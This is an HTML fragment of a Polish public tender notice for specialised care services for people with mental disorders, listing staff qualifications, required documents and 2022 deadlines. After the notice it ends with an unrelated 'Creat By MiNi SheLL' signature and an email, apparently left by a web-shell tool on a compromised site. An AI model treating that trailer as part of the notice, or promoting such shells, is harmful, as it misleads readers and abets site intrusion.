przeszkolenie i doświadczenie, tj:<br/>1)	część I: „Uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia” wykonywana przez osoby:<br/>a) posiadające kwalifikacje do wykonywania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego i pielęgniarki. <br/>b) posiadające co najmniej półroczny staż w jednej z następujących jednostek:<br/>- szpitalu psychiatrycznym;<br/>- jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi;<br/>- placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym;<br/>- ośrodku terapeutyczno-edukacyjno-wychowawczym;<br/>- zakładzie rehabilitacji;<br/>- innej jednostce świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.<br/>c) posiadające przeszkolenie w zakresie:<br/>- umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań;<br/>- kształtowania nawyków celowej aktywności;<br/>- prowadzenia treningu zachowań społecznych.<br/>d) posiadające doświadczenie – co najmniej 6 miesięczne doświadczenie w wykonywaniu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w zakresie uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia. <br/><br/>2) części II „rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych” wykonywana przez osobę:<br/>a) posiadającą kwalifikacje: specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć specjalistyczne usługi opiekuńcze w zakresie rehabilitacji. <br/>b) posiadającą co najmniej półroczny staż w jednej z następujących jednostek:<br/>- szpitalu psychiatrycznym;<br/>- jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi;<br/>- placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym;<br/>- ośrodku terapeutyczno-edukacyjno-wychowawczym;<br/>- zakładzie rehabilitacji;<br/>- innej jednostce świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.<br/>c) posiadającą doświadczenie – co najmniej 6 miesięczne doświadczenie w wykonywaniu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w zakresie rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych. <br/><br/>Osoby wskazane przez wykonawcę do wykonywania specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w konkretnej części zamówienia muszą posiadać wymagane wykształcenie, doświadczenie oraz przeszkolenia w zakresie określonym w Rozdziale IV ust. 4 SWZ oraz muszą posiadać doświadczenie w wykonywaniu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi przez okres co najmniej 6 miesięcy. <br/><br/>Wymóg dotyczący 6-miesięcznego doświadczenia musi zostać spełniony w części I zamówienia: dla 2 osób, w części II zamówienia: dla 1 osoby. Oznacza to, że w przypadku zatrudnienia większej ilości osób ponad minimalną liczbę określoną w ust. 3 pkt 4a SWZ dopuszcza się by pozostałe osoby spełniany tylko wymogi określone w Rozporządzeniu Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie specjalistycznych usług opiekuńczych (Dz.U.2005.189.1598 ze zm.).<br/><br/>Ocena spełnienia warunku będzie dokonana na podstawie złożonego przez Wykonawcę wykazu osób zgodnie z załącznikiem nr 5 do SWZ wraz z dokumentami potwierdzającymi posiadane kwalifikacje, staż, przeszkolenie oraz doświadczenie osoby wskazanej do wykonywania specjalistycznych usług opiekuńczych - na zasadzie spełnia /nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego (zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>1. W celu potwierdzenia przez wykonawcę braku podstaw wykluczenia z postępowania, Zamawiający żąda złożenia :<br/>1) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe (aktualne na dzień złożenia) składane na wezwanie Zamawiającego (zgodnie z art. 274 ust. 1 ustawy Pzp ) przez wykonawcę, którego oferta została najwyżej oceniona, w wyznaczonym terminie, nie krótszym niż 5 dni.<br/>1. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, Zamawiający żąda złożenia wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia: <br/>1)	w części I: 2 osoby, które posiadają wymagane kwalifikacje do wykonywania zawodu, staż, przeszkolenie i doświadczenie w wykonywaniu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi, tj.: <br/>a) posiadające kwalifikacje do wykonywania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego i pielęgniarki. <br/>b) posiadające co najmniej półroczny staż w jednej z następujących jednostek:<br/>- szpitalu psychiatrycznym;<br/>- jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi;<br/>- placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym;<br/>- ośrodku terapeutyczno-edukacyjno-wychowawczym;<br/>- zakładzie rehabilitacji;<br/>- innej jednostce świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.<br/>c) posiadające przeszkolenie i doświadczenie w zakresie:<br/>- umiejętności kształtowania motywacji do akceptowanych przez otoczenie zachowań;<br/>- kształtowania nawyków celowej aktywności;<br/>- prowadzenia treningu zachowań społecznych.<br/>d) posiadające doświadczenie – co najmniej 6 miesięczne doświadczenie w wykonywaniu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w zakresie uczenie i rozwijanie umiejętności niezbędnych do samodzielnego życia. <br/><br/>2) w części II – 1 osoba, która posiada wymagane kwalifikacje do wykonywania zawodu, staż i doświadczenie w wykonywaniu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi, tj.: <br/>a) posiadająca kwalifikacje: specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć specjalistyczne usługi opiekuńcze w zakresie rehabilitacji. <br/>b) posiadająca co najmniej półroczny staż pracy w jednej z następujących jednostek:<br/>- szpitalu psychiatrycznym;<br/>- jednostce organizacyjnej pomocy społecznej dla osób z zaburzeniami psychicznymi;<br/>- placówce terapii lub placówce oświatowej, do której uczęszczają dzieci z zaburzeniami rozwoju lub upośledzeniem umysłowym;<br/>- ośrodku terapeutyczno-edukacyjno-wychowawczym;<br/>- zakładzie rehabilitacji;<br/>- innej jednostce świadczącej specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi.<br/>c)	posiadająca doświadczenie – co najmniej 6 miesięczne doświadczenie w wykonywaniu specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w zakresie rehabilitacja fizyczna i usprawnienie zaburzonych funkcji organizmu w zakresie nieobjętym przepisami ustawy z dnia 27 sierpnia 2004 r. o świadczeniach opieki zdrowotnej finansowanych ze środków publicznych. <br/><br/>- zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ oraz załączonymi dokumentami potwierdzającymi posiadaną wiedzę, doświadczenie, kwalifikacje oraz staż pracy osoby wskazanej do wykonywania specjalistycznych usług opiekuńczych - na zasadzie spełnia /nie spełnia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dokumenty składane wraz z ofertą:<br/>1) Formularz ofertowy – sporządzony wg załącznika na 2 do SWZ. Formularz musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Brak jego złożenia bądź niewłaściwa forma będą skutkować odrzuceniem oferty. Formularz oferty nie podlega uzupełnieniu. <br/><br/>2. Do oferty Wykonawca dołącza:<br/>1) Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu w zakresie wskazanym w rozdziale VII SWZ. <br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Wzór oświadczenia określa załącznik Nr 3 do SWZ<br/>Oświadczenie składają odrębnie:<br/>- w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia. <br/>2) Oświadczenie wykonawcy dotyczące spełnienia warunków udziału w postępowaniu w zakresie wskazanym w rozdziale VI SWZ. <br/>Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Wzór oświadczenia określa załącznik Nr 4 do SWZ.<br/>Oświadczenie składają odrębnie:<br/>- w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa składa każdy z wykonawców. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3) Pełnomocnictwo:<br/>- Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <br/>- W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, z którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia; powinno zawierać: nazwę postępowania o zamówienie publiczne, którego dotyczy, wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, ustanowionego pełnomocnika oraz zakres jego umocowania.<br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza.<br/>4) Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy) – w sytuacji, gdy oferta lub inne dokumenty składane w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2020r poz. 1913 z późn. zm.). Dokument musi być złożony w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia:<br/>1)	wspólnie muszą wykazać, że wspólnie spełniają warunki udziału w postępowaniu,<br/>2)	w stosunku do żadnego z nich nie zachodzi jakakolwiek podstawa do wykluczenia na zasadach określonych w Rozdziale VII. Oświadczenie o niepodleganiu wykluczeniu z postępowania składa każdy z Wykonawców, <br/>3)	w przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w art. 125 ust . 1 ustawy Pzp, składa każdy z Wykonawców. <br/>4)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,<br/>5)	muszą ustanowić pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Pełnomocnictwo musi mieć formę pisemną lub kopię potwierdzona przez notariusza,<br/>6)	przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający wezwie do przedstawienia umowy regulującej współpracę tych wykonawców,<br/>7)	przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-09 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć w terminie do dnia 09.03.2022 r do godz. 09:00 za pośrednictwem Platformy miniPortal.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-09 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com